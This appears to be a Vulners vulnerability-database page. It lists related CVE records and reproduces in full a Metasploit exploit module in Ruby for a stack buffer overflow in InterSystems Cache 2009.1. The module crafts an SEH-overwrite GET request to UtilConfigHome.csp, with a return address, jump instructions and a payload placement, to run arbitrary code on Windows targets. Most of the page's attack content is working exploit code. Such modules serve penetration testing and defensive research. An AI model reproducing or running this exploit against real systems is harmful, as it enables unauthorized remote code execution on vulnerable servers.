Lucene search
+L

InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow

🗓️ 29 Sep 2009 00:00:00Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 29 Views

InterSystems Cache UtilConfigHome.csp Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
attackerkb
CVE-2009-20005
16 Sep 202514:32
–attackerkb
circl
Circl
CVE-2009-20005
29 May 201815:50
–circl
cnnvd
CNNVD
InterSystems Caché 安全漏洞
16 Sep 202500:00
–cnnvd
cve
CVE
CVE-2009-20005
16 Sep 202514:32
–cve
cvelist
Cvelist
CVE-2009-20005 InterSystems Caché UtilConfigHome.csp Stack Buffer Overflow
16 Sep 202514:32
–cvelist
euvd
EUVD
EUVD-2009-5127
7 Oct 202500:30
–euvd
nvd
NVD
CVE-2009-20005
16 Sep 202515:15
–nvd
ptsecurity
Positive Technologies
PT-2025-38001
16 Sep 202500:00
–ptsecurity
rapid7
Rapid7 Vulnerability Database (full)
CVE-2009-20005: Stack-based Buffer Overflow
16 Sep 202500:00
–rapid7
redhatcve
RedhatCVE
CVE-2009-20005
18 Sep 202515:27
–redhatcve
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # XXX: Needs custom body check HttpFingerprint = { :uri => '/csp/sys/mgr/UtilConfigHome.csp', :body => [ /Cache for Windows/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in InterSystems Cache 2009.1.
          By sending a specially crafted GET request, an attacker may be able to execute
          arbitrary code.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2009-20005' ],
          [ 'OSVDB', '60549' ],
          [ 'BID', '37177' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Privileged' => true,
        'Payload' => {
          'Space' => 650,
          'BadChars' => "\x00\x3a\x26\x3f\x0c\x25\x23\x20\x0a\x0d\x09\x2f\x2b\x2e\x0b\x5c",
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Windows 2000 SP4 English', { 'Offset' => 710, 'Ret' => 0x6ff2791a } ], # libhttpd.dll 2.2.11.0 / pop ebp | pop ebx | ret
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-09-29',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    ) # Initially...!

    register_options([ Opt::RPORT(57772) ])
  end

  def exploit
    # offset to the seh frame.
    sploit = payload.encoded + rand_text_alpha_upper(target['Offset'] - payload.encoded.length)
    # jmp $+6 | p/p/r
    sploit << Rex::Arch::X86.jmp_short(6) + [target.ret].pack('V')
    # fall into some nops, jmp back to our final payload.
    sploit << make_nops(8) + [0xe9, -700].pack('CV')
    # cause the av!
    sploit << rand_text_alpha_upper(payload.encoded.length)

    print_status("Trying target #{target.name}...")

    send_request_raw({
      'uri' => '/csp/sys/mgr/UtilConfigHome.csp=' + sploit,
      'method' => 'GET',
    }, 5)

    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation